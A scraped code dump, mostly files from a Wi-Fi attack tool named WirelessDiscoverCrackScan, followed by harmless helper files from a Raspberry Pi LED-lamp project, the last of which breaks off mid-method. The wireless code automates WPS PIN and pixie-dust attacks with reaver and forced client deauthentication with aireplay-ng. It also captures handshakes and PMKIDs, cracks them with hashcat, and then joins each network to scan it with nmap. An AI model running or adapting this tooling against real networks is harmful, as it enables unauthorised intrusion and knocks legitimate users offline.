        udp     -- True: -sU over top 10 ports; False: -sS over top 100.
        verbose -- adds version detection/scripts (-sXVC) and -v output.
        The scan is polled every 30s and abandoned after ~5 minutes.
        """
        nmap = None
        try:
            scan_type = "-sU" if udp else "-sS"
            ports = "10" if udp else "100"
            name_suffix = "UDP" if udp else "TCP"
            if verbose:
                scan_type += "VC"
                name_suffix += "-V"
            out_file = self.file_manager.filepath("nmap_{}_{}".format(ap.bssid, name_suffix))
            cmd = ["nmap", "-oN", out_file, "-Pn", "-n", scan_type, "--top-ports", ports, "-e", self.config.iface]
            if verbose:
                cmd.append("-v")
            cmd.append(ip_cidr)
            nmap = Process.start_process_stdout(cmd)
            count = 0
            while True:
                count += 1
                time.sleep(30)
                if nmap.poll() is not None:
                    Logger.log("nmap done")
                    break
                if count >= 10:
                    Logger.log("nmap too long. stopping.")
                    break
            with open(out_file) as f:
                result = f.read()
            self.db.insert_scan_result(ap.bssid, result)
        finally:
            # BUGFIX: the original condition was `poll() is not None`, which
            # killed nmap only when it had ALREADY exited and leaked a
            # still-running process; kill it only while it is alive.
            if nmap and nmap.poll() is None:
                nmap.kill()

    def scan(self, ap):
        """Associate with *ap*, obtain a DHCP lease and run the scan suite."""
        supplicant = None
        dhclient = None
        try:
            if ap.enc == "OPN":
                supplicant = WpaSupplicant.connect_open(ap, self.config, self.file_manager, wait=True)
            else:
                psk = self.db.select_psk_for_ap(ap)
                supplicant = WpaSupplicant.connect_wpa(ap, psk, self.config, self.file_manager, wait=True)
            # Release any old lease, then request a fresh one.
            dhclient = Process.start_process_pipe(["dhclient", "-r", self.config.iface])
            dhclient.wait(10)
            dhclient = Process.start_process_pipe(["dhclient", self.config.iface])
            dhclient.wait(10)
            ip = Process.start_process_pipe(["ip", "a", "show", self.config.iface])
            out = ip.communicate()[0].decode("utf-8")
            inet = [line for line in out.split("\n") if "inet " in line]
            if len(inet) > 0:
                Logger.log(inet[0])
                ip_cidr = inet[0].split()[1]  # e.g. "192.168.1.5/24"
                self.__start_nmap(ap, ip_cidr, udp=False)
                self.__start_nmap(ap, ip_cidr, udp=True)
                self.__start_nmap(ap, ip_cidr, udp=False, verbose=True)
            else:
                Logger.log("No connection")
        finally:
            if supplicant:
                supplicant.kill()
            if dhclient:
                dhclient.kill()
                # Release the lease we took during the scan.
                dhclient = Process.start_process_pipe(["dhclient", "-r", self.config.iface])
                dhclient.wait(10)
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,407
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/process.py
|
from wdcs.logger import Logger
import subprocess
import os
from wdcs import timeutils
import time
class Process(object):
    """Convenience wrappers around subprocess.Popen with preset stream wiring."""

    @classmethod
    def start_process_pipe(cls, cmd):
        """Capture stdout via a pipe, folding stderr into it."""
        return cls.start_process(cmd, subprocess.PIPE, subprocess.STDOUT)

    @classmethod
    def start_process_pipe_stdout(cls, cmd):
        """Capture stdout via a pipe; discard stderr."""
        return cls.start_process(cmd, subprocess.PIPE, subprocess.DEVNULL)

    @classmethod
    def start_process_devnull(cls, cmd):
        """Discard both stdout and stderr."""
        return cls.start_process(cmd, subprocess.DEVNULL, subprocess.DEVNULL)

    @classmethod
    def start_process_stdout(cls, cmd):
        """Inherit the parent's stdout and stderr."""
        return cls.start_process(cmd, None, None)

    @classmethod
    def start_process_shell(cls, cmd):
        """Run *cmd* through the shell, inheriting stdout/stderr."""
        return cls.start_process(cmd, None, None, True)

    @classmethod
    def start_process(cls, cmd, stdout, stderr, shell=False):
        """Log the command line, spawn it, and return the Popen handle."""
        Logger.log("Executing cmd: {}".format(cmd))
        return subprocess.Popen(cmd, stdout=stdout, stderr=stderr, shell=shell)
class AirodumpProcess(Process):
    """Runs a background airodump-ng capture writing csv + pcap output files."""

    def __init__(self, interface, file_manager, ap=None):
        # With *ap* given, the capture is locked to that bssid and channel.
        self.file_manager = file_manager
        self.__prepare_output_files()
        cmd = ["airodump-ng", "--wps", "--output-format", "csv,pcap", "-w", self.file_manager.filepath("outa"), "--write-interval", "10"]
        if ap:
            cmd.append("--bssid")
            cmd.append(ap.bssid)
            cmd.append("-c")
            cmd.append(ap.channel)
        cmd.append(interface)
        self.p = Process.start_process_devnull(cmd)

    def __extract_last_file_number(self, ls_result, extension):
        # Highest NN among existing "outa-NN<extension>" files; 0 when none.
        x = [self.safe_int(x.replace("outa-", "").replace(extension, "")) for x in ls_result if
             x.startswith("outa-") and x.endswith(extension)]
        x.sort(reverse=True)
        if len(x) > 0:
            return x[0]
        return 0

    def safe_int(self, val):
        # Best-effort int(); unparsable values count as 0.
        try:
            return int(val)
        except:
            return 0

    def __prepare_output_files(self):
        """Predict the csv/cap paths airodump-ng will create for this run.

        airodump-ng appends an incrementing -NN suffix to the prefix; the
        zero-padded {:02} format presumably matches that suffix — TODO
        confirm behavior for runs past 99.
        """
        pp = Process.start_process_pipe(["ls", self.file_manager.filepath(".")])
        ls_out = pp.communicate()[0].decode("utf-8").split("\n")
        csv_number = self.__extract_last_file_number(ls_out, ".csv")
        cap_number = self.__extract_last_file_number(ls_out, ".cap")
        if csv_number != cap_number:
            Logger.log("Something wrong with output files. CSV: {}, CAP: {}".format(csv_number, cap_number))
        new_number = csv_number + 1
        self.csv_filepath = self.file_manager.filepath("outa-{:02}.csv".format(new_number))
        self.pcap_filepath = self.file_manager.filepath("outa-{:02}.cap".format(new_number))

    def wait_for_files(self):
        """Block (max ~50s) until both output files exist, else raise."""
        Logger.log("Waiting for {} and {}".format(self.file_manager.filename(self.csv_filepath), self.file_manager.filename(self.pcap_filepath)))
        wait_limit = 10
        while not (os.path.exists(self.csv_filepath) and os.path.exists(self.pcap_filepath)):
            wait_limit -= 1
            if wait_limit == 0:
                raise Exception("It's not gonna happen")
            time.sleep(5)
        Logger.log("Files exist")

    def kill(self):
        """Terminate the airodump-ng child process."""
        self.p.kill()
class WpaSupplicant(object):
    """Associates to an AP by generating a config and spawning wpa_supplicant."""

    @classmethod
    def __write_config(cls, ap, r, file_manager):
        # Persist the generated wpa_supplicant config; returns its path.
        conf_file = file_manager.filepath("wpa_supplicant_{}.conf".format(ap.bssid))
        with open(conf_file, "w") as f:
            f.write(r)
        return conf_file

    @classmethod
    def __connect(cls, ap, config, file_manager, file_config_content, wait, second_iface):
        """Start wpa_supplicant with the given config text.

        With wait=True, polls the output file (up to ~50s) for
        CTRL-EVENT-CONNECTED and raises if association never happens;
        otherwise returns the Popen handle immediately.
        """
        conf_file = cls.__write_config(ap, file_config_content, file_manager)
        iface = config.iface_client if second_iface else config.iface
        out_file = file_manager.filepath("out_wpa_supplicant")
        if os.path.isfile(out_file):
            os.remove(out_file)  # a stale file would fake a connect event
        pw = Process.start_process_stdout(["wpa_supplicant", "-i", iface, "-c", conf_file, "-f", out_file])
        if wait:
            tries = 0
            while tries < 5:
                tries += 1
                time.sleep(10)
                with open(out_file) as f:
                    if len([c for c in f.readlines() if "CTRL-EVENT-CONNECTED" in c]) > 0:
                        return pw
            raise Exception("Cannot connect using {}".format(conf_file))
        else:
            return pw

    @classmethod
    def connect_wpa(cls, ap, psk, config, file_manager, wait=False, second_iface=False):
        """Associate to a WPA-PSK network; config generated by wpa_passphrase."""
        p = Process.start_process_pipe(["wpa_passphrase", "{}".format(ap.essid), psk])
        r = p.communicate()[0].decode("utf-8")
        return cls.__connect(ap, config, file_manager, r, wait, second_iface)

    @classmethod
    def connect_open(cls, ap, config, file_manager, wait=False):
        """Associate to an open (unencrypted) network."""
        template = "network={{\n\tssid=\"{}\"\n\tkey_mgmt=NONE\n}}".format(ap.essid)
        return cls.__connect(ap, config, file_manager, template, wait, False)
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,408
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/hashcat.py
|
import subprocess

from wdcs import process
from wdcs.logger import Logger
class Hashcat(object):
    """Wraps the hashcat CLI for PMKID (mode 16800) and 4-way-handshake
    (mode 2500) cracking against the configured dictionary."""

    def __init__(self, config):
        # config.hashcat_dictionary supplies the wordlist path.
        self.config = config

    def crack_pmkid(self, filepath):
        """Crack a PMKID hash file; returns the recovered PSK or None/""."""
        return self.__crack(filepath, "16800")

    def crack_4hs(self, filepath):
        """Crack an hccapx handshake file; returns the recovered PSK or None/""."""
        return self.__crack(filepath, "2500")

    def __crack(self, filepath, type):
        """Run hashcat for at most 300s, then query its potfile for a result."""
        p = None
        try:
            p = process.Process.start_process_stdout(
                ["hashcat", "--force", "-a", "0", "-m", type, filepath, self.config.hashcat_dictionary])
            p.wait(300)
        # BUGFIX: Popen.wait(timeout) raises subprocess.TimeoutExpired, not
        # TimeoutError, so the original except clause could never fire and a
        # timeout propagated out of this method.
        except subprocess.TimeoutExpired:
            Logger.log("hashcat takes too long.")
        finally:
            # BUGFIX: guard against start_process_stdout itself failing, which
            # previously left `p` unbound and raised in this finally block.
            if p:
                p.kill()
        return self.__check_result(filepath, type)

    def __check_result(self, filepath, type):
        """Return the PSK recorded by `hashcat --show` ("" when none)."""
        p = process.Process.start_process_pipe(["hashcat", "--show", "-m", type, filepath])
        out = p.communicate()[0].decode("utf-8")
        try:
            # Potfile lines are "hash:...:psk"; take the trailing field.
            return out.split("\n")[0].split(":")[-1]
        except IndexError:
            Logger.log("Invalid hashcat output: {}".format(out))
            return None
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,409
|
mmmds/WirelessDiscoverCrackScan
|
refs/heads/master
|
/wdcs/crack.py
|
from wdcs.basicutils import *
from wdcs.logger import Logger
from timeit import default_timer as timer
from wdcs import timeutils
import sys
import traceback
import time
import string
import random
class CrackSuccess(Exception):
    """Control-flow exception: cracking succeeded and results were stored."""
    pass
class CrackSuccessNoPsk(CrackSuccess):
    """Material (handshake/PMKID) was captured, but no PSK was recovered."""
    pass
class NoStations(Exception):
    """Raised when an attack needs associated stations and none are seen."""
    pass
class WpsCracker(object):
    """Attacks WPS with reaver (optionally pixie-dust) and stores results."""

    def __init__(self, config, file_manager, database):
        self.config = config
        self.file_manager = file_manager
        self.db = database

    def crack(self, ap, pixie):
        """Run reaver against *ap*; pixie=True enables the pixie-dust attack.

        Tails reaver's redirected output file once per second, reacting to
        PIN/PSK result lines and to deauth/timeout/rate-limit warnings.
        Raises CrackSuccess after storing any recovered PIN/PSK; returns
        None when nothing was found.
        """
        Logger.log("Starting Reaver (pixie={})...".format(pixie))
        wps_pin = None
        wpa_psk = None
        p = None
        try:
            # A leftover session file would make reaver resume silently.
            session_file = "/usr/local/var/lib/reaver/{}.wpc".format(ap.bssid)
            if os.path.exists(session_file):
                os.remove(session_file)
            output_path = self.file_manager.filepath("reaver_{}_{}".format(ap.bssid, pixie))
            pixie_cmd_param = "-K" if pixie else ""
            p = Process.start_process_shell(
                "reaver -i {} -b {} -c {} {} -N -vv >{} 2>&1".format(
                    self.config.iface, Bssid.make_colon_bssid(ap.bssid),
                    ap.channel, pixie_cmd_param, output_path))
            start_time = timer()
            reaver_done = False
            total_count = 0        # number of output lines already processed
            deauth_counter = 0
            timeout_counter = 0
            rate_limiting_counter = 0
            while not reaver_done:
                time.sleep(1)
                with open(output_path) as rfile:
                    count = -1
                    for line in rfile:
                        count += 1
                        if count <= total_count:
                            continue  # skip lines handled in an earlier pass
                        Logger.print_nolog(line.strip())
                        if not wps_pin and ("[+] WPS PIN:" in line or "[+] WPS pin:" in line):
                            Logger.log("Found PIN!")
                            try:
                                wps_pin = line.split(":")[1].strip()
                                if wpa_psk:
                                    reaver_done = True  # have both, stop
                            except:
                                Logger.log("Cannot parse PIN: {}".format(line.strip()))
                                reaver_done = True
                        elif not wpa_psk and "[+] WPA PSK:" in line:
                            Logger.log("Found PSK!")
                            try:
                                wpa_psk = line.split("'")[1].strip()
                                if wps_pin:
                                    reaver_done = True
                            except:
                                Logger.log("Cannot parse PSK: {}".format(line.strip()))
                                reaver_done = True
                        elif "[+] Received deauth request" in line:
                            deauth_counter += 1
                            if deauth_counter == 5:
                                Logger.log("Too many deauths. Skipping...")
                                reaver_done = True
                        elif "[!] WARNING: Receive timeout occurred" in line:
                            timeout_counter += 1
                            if timeout_counter == 5:
                                Logger.log("Too many timeouts. Skipping...")
                                reaver_done = True
                        elif "[!] WARNING: Detected AP rate limiting" in line:
                            rate_limiting_counter += 1
                            if rate_limiting_counter == 2:
                                Logger.log("Rate limiting. Skipping...")
                                reaver_done = True
                        elif "[-] Pixiewps fail" in line:
                            Logger.log("Pixie failed")
                            reaver_done = True
                    total_count = count
                if timer() - start_time > 600:
                    Logger.log("Reaver takes too long. Skipping...")
                    reaver_done = True
        except:
            # NOTE(review): bare except — swallows KeyboardInterrupt too.
            Logger.log("Cannot crack with reaver! {}".format(traceback.format_exc()))
        finally:
            if p:
                p.kill()
        if wps_pin or wpa_psk:
            print("Reaver result: WPS PIN = {}, WPA PSK = {}".format(wps_pin, wpa_psk))
            ap.wps = wps_pin is not None
            ap.psk = wpa_psk is not None
            self.db.update_ap_wps(ap, wps_pin, wpa_psk)
            raise CrackSuccess()
class WpaCrackUtils(object):
    """Helpers for extracting WPA handshake / PMKID material from pcap files
    and feeding it to hashcat for cracking."""

    def __init__(self, file_manager, db, hashcat):
        # file_manager: resolves paths/names for working files
        # db: persistence layer for captured material and cracked credentials
        # hashcat: wrapper that launches hashcat cracking jobs
        self.db = db
        self.file_manager = file_manager
        self.hashcat = hashcat

    def extract_ap_station_communication_from_pcap(self, pcap_filename, ap_bssid_colon, station_bssid_colon):
        """Filter a capture down to frames exchanged between one AP and one station.

        :param pcap_filename: source capture to filter
        :param ap_bssid_colon: AP BSSID in colon notation
        :param station_bssid_colon: station BSSID in colon notation
        :return: path of the filtered libpcap file written by tshark
        """
        filtered_pcap = self.file_manager.filepath(
            "out_{}_{}.cap".format(Bssid.normalize_bssid(ap_bssid_colon), Bssid.normalize_bssid(station_bssid_colon)))
        # Keep only frames whose src/dst addresses are exactly this AP/station
        # pair, in either direction.
        ap_station_only_filter = "((wlan.da == {} and wlan.sa == {}) or (wlan.sa == {} and wlan.da == {}))".format(
            station_bssid_colon, ap_bssid_colon, station_bssid_colon, ap_bssid_colon)
        pt = Process.start_process_pipe_stdout(
            ["tshark", "-r", pcap_filename, "-Y", ap_station_only_filter, "-F", "libpcap", "-w", filtered_pcap])
        pt.wait()
        return filtered_pcap

    def read_and_crack_handshake(self, ap, pcap, airodump):
        """Extract a 4-way handshake for *ap* from *pcap* and try to crack it.

        Raises CrackSuccess when a PSK is found (and stored in the DB),
        CrackSuccessNoPsk when the handshake was captured but cracking failed.
        """
        file_4hs = self.__read_handshake(ap, pcap, airodump)
        if file_4hs:
            psk = self.hashcat.crack_4hs(file_4hs)
            if psk and len(psk) > 0:
                Logger.log("Found PSK: {}, AP: {}".format(psk, ap.essid))
                self.db.update_psk_for_bssid(ap.bssid, psk)
                ap.psk = True
                raise CrackSuccess
            else:
                raise CrackSuccessNoPsk

    def __read_handshake(self, ap, pcap, airodump=None):
        """Export the 4-way handshake via aircrack-ng (-j -> .hccapx).

        :return: path of the non-empty .hccapx file, or None if no handshake
                 was captured. Stores the raw bytes in the DB on success.
        """
        hs4_file = self.file_manager.filepath("4hs_{}".format(ap.bssid))
        pa = Process.start_process_pipe(["aircrack-ng", "-b", Bssid.make_colon_bssid(ap.bssid), "-j", hs4_file, pcap])
        time.sleep(2)
        # NOTE(review): this kills the process only when poll() reports it has
        # ALREADY exited; possibly the condition was meant to be inverted
        # (kill if still running after 2s) -- confirm intent.
        if pa.poll() is not None:
            pa.kill()
        try:
            # aircrack-ng's -j option appends the .hccapx extension itself.
            hs4_file_ext = "{}.hccapx".format(hs4_file)
            with open(hs4_file_ext, "rb") as f:
                data = f.read()
                if len(data) > 0:
                    if airodump:
                        # Capture no longer needed once the handshake is saved.
                        airodump.kill()
                    Logger.log("Handshake collected ({} bytes in {})".format(
                        len(data), self.file_manager.filename(hs4_file_ext)))
                    self.db.update_ap_wpa_handshake(ap, data)
                    ap.hs4 = True
                    return hs4_file_ext
                else:
                    # Empty output counts as "not captured"; funnel into the
                    # same handler as a missing file.
                    raise FileNotFoundError()
        except FileNotFoundError:
            Logger.log("WPA handshake not captured!")
            return None

    # NOTE(review): parameter name `filter` shadows the builtin; kept for
    # interface compatibility.
    def read_tshark(self, filename, filter):
        """Run tshark over *filename* with display filter *filter*.

        :return: list of output lines, each with tab-separated fields
        """
        pt = Process.start_process_pipe_stdout(["tshark", "-n", "-r", filename, "-Y", filter, "-T", "tabs"])
        messages = pt.communicate()[0].decode("utf-8")
        return messages.split("\n")

    def count_pmkid_messages(self, pcap_path):
        """Count EAPOL "Message 1" frames that carry a PMKID, grouped per AP.

        :return: dict mapping normalized BSSID -> number of M1 frames seen
        """
        aps = {}
        lines = self.read_tshark(pcap_path, "eapol and wlan.rsn.ie.pmkid")
        for m in [m for m in lines if "Message 1" in m]:
            # Column 2 is presumably the transmitter (AP) address -- consistent
            # with how M1 frames are parsed elsewhere in this project.
            ap = Bssid.normalize_bssid(m.split("\t")[2])
            if ap not in aps:
                aps[ap] = 1
            else:
                aps[ap] += 1
        return aps

    def convert_and_crack_pcap_pmkid(self, ap, pcap_filepath):
        """Convert a capture to hashcat 16800 format and try to crack the PMKID.

        Raises CrackSuccess when a PSK is found, CrackSuccessNoPsk when a
        PMKID was extracted but cracking yielded nothing.
        """
        file_pmkid = self.__convert_pcap_pmkid(ap, pcap_filepath)
        if file_pmkid:
            out = self.hashcat.crack_pmkid(file_pmkid)
            if out and len(out) > 0:
                Logger.log("Found PSK: {}, AP: {}".format(out, ap.essid))
                self.db.update_psk_for_bssid(ap.bssid, out)
                ap.psk = True
                raise CrackSuccess
            else:
                raise CrackSuccessNoPsk

    def __convert_pcap_pmkid(self, ap, pcap_filename):
        """Extract this AP's PMKID from a pcap via hcxpcaptool (-k -> 16800 file).

        :return: path of the PMKID file, or None when extraction failed or
                 produced an empty file. Stores the PMKID in the DB on success.
        """
        pmkid_filename = self.file_manager.filepath("pmkid_{}.16800".format(ap.bssid))
        ph = Process.start_process_pipe(
            ["hcxpcaptool", "--filtermac", ap.bssid, "-k", pmkid_filename, pcap_filename])
        out = ph.communicate()[0].decode("utf-8")
        Logger.log(out)
        if "PMKID(s) written to" in out:
            with open(pmkid_filename, "r") as pmkid_file:
                pmkid = "".join(pmkid_file.readlines()).strip()
                if len(pmkid) > 0:
                    Logger.log("PMKID collected ({})".format(self.file_manager.filename(pmkid_filename)))
                    self.db.update_ap_pmkid(ap, pmkid)
                    ap.pmkid = True
                    return pmkid_filename
                else:
                    ap.pmkid = None
                    Logger.log("Problem with converting - empty PMKID")
        else:
            Logger.log("Problem with converting {}".format(self.file_manager.filename(pcap_filename)))
        return None
class WpaPmkidCracker(object):
    """Solicits a PMKID from an AP by attempting an association (the password
    used does not need to be correct) while capturing with airodump."""

    def __init__(self, file_manager, crack_utils, config):
        self.file_manager = file_manager
        self.crack_utils = crack_utils
        self.config = config

    def crack_wpa_pmkid(self, ap):
        """Try to capture and crack a PMKID for *ap*.

        Starts a capture, repeatedly attempts association with a throwaway
        password and polls the capture for M1 frames carrying a PMKID.
        Raises CrackSuccess when a PSK is cracked; all other failures are
        logged and swallowed. Always tears down the capture and supplicant.
        """
        Logger.log("Trying to get PMKID...")
        pw = None
        airodump = None
        try:
            airodump = AirodumpProcess(self.config.iface, self.file_manager, ap)
            # The password value doesn't matter; the AP sends the PMKID in M1
            # before the credentials are validated.
            rnd_password = "".join(random.sample(string.ascii_letters, 8))
            pw = WpaSupplicant.connect_wpa(ap, rnd_password, self.config, self.file_manager, second_iface=True)
            time.sleep(5)
            tries = 6
            while tries > 0:
                tries -= 1
                time.sleep(30)
                messages_count = self.crack_utils.count_pmkid_messages(airodump.pcap_filepath)
                if len(messages_count) < 1 or ap.bssid not in messages_count:
                    continue
                messages_count = messages_count[ap.bssid]
                Logger.log("Gathered {} M1 messages".format(messages_count))
                if messages_count > 0:
                    tries = 0  # stop retrying after this attempt
                    Logger.log("Convert pcap")
                    self.crack_utils.convert_and_crack_pcap_pmkid(ap, airodump.pcap_filepath)
        except CrackSuccess:
            raise  # bare re-raise preserves the original traceback
        except Exception:
            # Fixed: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit; best-effort logging is preserved.
            Logger.log("Cannot find PMKID! {}".format(traceback.format_exc()))
        finally:
            if airodump:
                airodump.kill()
            if pw:
                pw.kill()
class WpaHandshakeCracker(object):
    """Captures a WPA 4-way handshake (optionally forcing it via deauth) and
    hands it to WpaCrackUtils for cracking."""

    def __init__(self, config, crack_utils, file_manager):
        self.config = config
        self.crack_utils = crack_utils
        self.file_manager = file_manager

    def crack_wpa_handshake(self, ap, stations, deauth=False):
        """Try to capture and crack a handshake for *ap*.

        :param ap: target access point
        :param stations: known client stations of the AP (must be non-empty)
        :param deauth: when True, actively deauth each station to force a
                       re-handshake; when False, wait passively
        Raises CrackSuccess on a cracked PSK and NoStations when *stations*
        is empty; other failures are logged and swallowed. Always stops the
        capture process.
        """
        Logger.log("Trying to get WPA handshake")
        airodump = None
        try:
            if len(stations) == 0:
                raise NoStations()
            airodump = AirodumpProcess(self.config.iface, self.file_manager, ap)
            # Hoisted: the AP address is the same for every iteration.
            ap_bssid_colon = Bssid.make_colon_bssid(ap.bssid)
            tries = 0
            tries_limit = (len(stations) * self.config.TRIES_PER_STATION) if deauth else self.config.TRIES_LIMIT_NO_DEAUTH
            Logger.log("tries limit {}".format(tries_limit))
            while tries < tries_limit:
                if deauth:
                    # Walk the station list, TRIES_PER_STATION attempts each,
                    # escalating the deauth burst and post-deauth wait.
                    station = stations[int(tries / self.config.TRIES_PER_STATION)]
                    station_try = ((tries % self.config.TRIES_PER_STATION) + 1)
                    Logger.log("Start deauth AP: {}, Station: {}".format(ap.bssid, station))
                    deauth_count = self.config.DEAUTH_COUNT_BASE * station_try
                    station_bssid_colon = Bssid.make_colon_bssid(station)
                    pd = Process.start_process_devnull(
                        ["aireplay-ng", "--deauth", str(deauth_count), "-a", ap_bssid_colon, "-c", station_bssid_colon,
                         self.config.iface])
                    pd.wait()
                    Logger.log("Stop deauth")
                    # Give the victim time to reconnect before checking the capture.
                    time.sleep(self.config.SLEEP_AFTER_DEAUTH_BASE * station_try)
                pt = Process.start_process_pipe_stdout(["tshark", "-r", airodump.pcap_filepath, "-Y",
                                                        "eapol and (wlan.sa == {} or wlan.da == {})".format(
                                                            ap_bssid_colon, ap_bssid_colon)])
                out = pt.communicate()[0].decode("utf-8")
                # M2 plus either M1 or M3 is enough material for cracking.
                if ("(Message 1 of 4)" in out or "(Message 3 of 4)" in out) and "(Message 2 of 4)" in out:
                    Logger.log("EAPOL messages gathered.")
                    pcap = airodump.pcap_filepath
                    if deauth:
                        pcap = self.crack_utils.extract_ap_station_communication_from_pcap(
                            airodump.pcap_filepath, ap_bssid_colon, station_bssid_colon)
                    self.crack_utils.read_and_crack_handshake(ap, pcap, airodump)
                else:
                    Logger.log("No EAPOL messages yet...")
                    if not deauth:
                        time.sleep(self.config.SLEEP_NO_DEAUTH)
                tries += 1
        except (CrackSuccess, NoStations):
            raise  # bare re-raise preserves the original traceback
        except Exception:
            # Fixed: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit.
            Logger.log("Cannot get WPA handshake! {}".format(traceback.format_exc()))
        finally:
            if airodump:
                airodump.kill()
|
{"/wdcs/ap.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs/timeutils.py"], "/wdcs/wdcs.py": ["/wdcs/config.py", "/wdcs/scan.py", "/wdcs/database.py", "/wdcs/discover.py", "/wdcs/timeutils.py", "/wdcs/crack.py", "/wdcs/hashcat.py"], "/wdcs/basicutils.py": ["/wdcs/process.py", "/wdcs/logger.py"], "/wdcs/discover.py": ["/wdcs/ap.py", "/wdcs/crack.py", "/wdcs/basicutils.py"], "/wdcs.py": ["/wdcs/wdcs.py"], "/wdcs/database.py": ["/wdcs/ap.py"], "/wdcs/config.py": ["/wdcs/basicutils.py", "/wdcs/logger.py"], "/wdcs/scan.py": ["/wdcs/crack.py", "/wdcs/logger.py", "/wdcs/process.py", "/wdcs.py"], "/wdcs/process.py": ["/wdcs/logger.py", "/wdcs.py"], "/wdcs/hashcat.py": ["/wdcs.py", "/wdcs/logger.py"], "/wdcs/crack.py": ["/wdcs/basicutils.py", "/wdcs/logger.py", "/wdcs.py"]}
|
34,410
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/utils.py
|
import math
import random
from color import Color
def blendChannel(a, b, t):
    """Blend one color channel from *a* to *b* at position *t* in [0, 1].

    Interpolation happens in squared (linear-light) space so the mix looks
    perceptually even; the endpoints are returned exactly.
    """
    if t == 0:
        return a
    if t == 1:
        return b
    mixed_square = (1 - t) * a * a + t * b * b
    return int(math.sqrt(mixed_square))
def bound(value, smallest, largest):
    """Clamp *value* into the inclusive range [smallest, largest]."""
    lower_clamped = value if value > smallest else smallest
    return lower_clamped if lower_clamped < largest else largest
def getNewRandomColor(previous):
    """Return a random color from Color.ALL that differs from *previous*.

    Note: loops forever if Color.ALL contains only *previous*.
    """
    color = None
    # `is None` per PEP 8 (was `== None`); random.choice replaces the manual
    # randint-index idiom.
    while color is None or color == previous:
        color = random.choice(Color.ALL)
    return color
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,411
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/baseEffect.py
|
import time
from leds import LedStripControl
from button import Button, ButtonCommand
class BaseEffect:
    """Base class for LED effects: subclasses override setup() and loop();
    run() drives the frame loop until a button command arrives."""

    button: Button
    ledStrip: LedStripControl
    isInfinite: bool
    loopInterval: int

    def __init__(self, ledStrip: LedStripControl, button: Button, isInfinite: bool = True, loopInterval: int = 10) -> None:
        self.ledStrip = ledStrip
        self.button = button
        self.isInfinite = isInfinite
        self.loopInterval = loopInterval

    def setup(self):
        """Hook: one-time initialisation before the frame loop starts."""
        pass

    def loop(self):
        """Hook: render a single frame of the effect."""
        pass

    def run(self) -> int:
        """Run the effect; return the ButtonCommand that interrupted it
        (clearing the strip first), or ButtonCommand.NONE for finite effects."""
        self.setup()
        while self.isInfinite:
